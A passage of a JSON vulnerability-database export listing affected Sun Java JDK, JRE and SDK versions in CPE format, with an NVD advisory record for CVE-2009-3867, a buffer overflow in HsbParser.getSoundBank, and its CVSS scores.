"cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Stack-based buffer overflow in the HsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a long file: URL in an argument, aka Bug Id 6854303.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3867", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3867"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3867", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3867", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", 